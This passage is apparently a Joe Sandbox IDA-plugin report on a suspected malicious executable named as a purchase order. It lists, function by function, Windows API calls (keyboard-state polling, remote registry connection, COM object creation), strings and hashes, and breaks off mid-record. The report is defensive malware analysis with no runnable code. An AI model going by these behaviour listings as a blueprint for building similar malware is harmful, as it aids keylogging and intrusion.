                                                    • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                      • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                      • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                      • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 0046CEA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 440038798-2785691316
                                                    • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                    • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                    • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                    • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                    • _wcslen.LIBCMT ref: 004610A3
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                    • GetWindowRect.USER32(?,?), ref: 00461248
                                                      • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                    • String ID: ThumbnailClass
                                                    • API String ID: 4136854206-1241985126
                                                    • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                    • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                    • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                    • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                    • GetClientRect.USER32(?,?), ref: 00471A1A
                                                    • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                    • String ID: 2
                                                    • API String ID: 1331449709-450215437
                                                    • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                    • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                    • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                    • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                    • __swprintf.LIBCMT ref: 00460915
                                                    • __swprintf.LIBCMT ref: 0046092D
                                                    • _wprintf.LIBCMT ref: 004609E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                    • API String ID: 3054410614-2561132961
                                                    • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                    • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                    • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                    • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                    • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                    • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                    • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 600699880-22481851
                                                    • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                    • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                    • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                    • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow
                                                    • String ID: static
                                                    • API String ID: 3375834691-2160076837
                                                    • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                    • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                    • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                    • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                    • API String ID: 2907320926-3566645568
                                                    • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                    • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                    • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                    • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                    APIs
                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                    • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                    • DeleteObject.GDI32(00000000), ref: 00470A04
                                                    • DestroyIcon.USER32(00450053), ref: 00470A1C
                                                    • DeleteObject.GDI32(47042465), ref: 00470A34
                                                    • DestroyWindow.USER32(00650073), ref: 00470A4C
                                                    • DestroyIcon.USER32(?), ref: 00470A73
                                                    • DestroyIcon.USER32(?), ref: 00470A81
                                                    • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 1237572874-0
                                                    • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                    • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                    • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                    • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                    • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                    • VariantInit.OLEAUT32(?), ref: 004793E1
                                                    • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                    • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                    • VariantClear.OLEAUT32(?), ref: 00479489
                                                    • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                    • VariantClear.OLEAUT32(?), ref: 004794CA
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                    • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                    • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                    • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044480E
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                    • GetKeyState.USER32(000000A0), ref: 004448AA
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                    • GetKeyState.USER32(000000A1), ref: 004448D9
                                                    • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                    • GetKeyState.USER32(00000011), ref: 00444903
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                    • GetKeyState.USER32(00000012), ref: 0044492D
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                    • GetKeyState.USER32(0000005B), ref: 00444958
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                    • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                    • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                    • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                    • String ID:
                                                    • API String ID: 3413494760-0
                                                    • Opcode ID: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                                    • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                    • Opcode Fuzzy Hash: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                                    • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AddressProc_free_malloc$_strcat_strlen
                                                    • String ID: AU3_FreeVar
                                                    • API String ID: 2634073740-771828931
                                                    • Opcode ID: 84f17276bf83cca5f38a906fa5b9d5cf91bf64f5b6f12b10d2c34b05558e006b
                                                    • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                    • Opcode Fuzzy Hash: 84f17276bf83cca5f38a906fa5b9d5cf91bf64f5b6f12b10d2c34b05558e006b
                                                    • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                    APIs
                                                    • CoInitialize.OLE32 ref: 0046C63A
                                                    • CoUninitialize.OLE32 ref: 0046C645
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                      • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                    • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                    • IIDFromString.OLE32(?,?), ref: 0046C705
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 2294789929-1287834457
                                                    • Opcode ID: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                                    • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                    • Opcode Fuzzy Hash: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                                    • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                    APIs
                                                      • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                      • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                    • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                    • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                    • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                    • ReleaseCapture.USER32 ref: 0047116F
                                                    • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                    Strings
                                                    Memory Dump Source
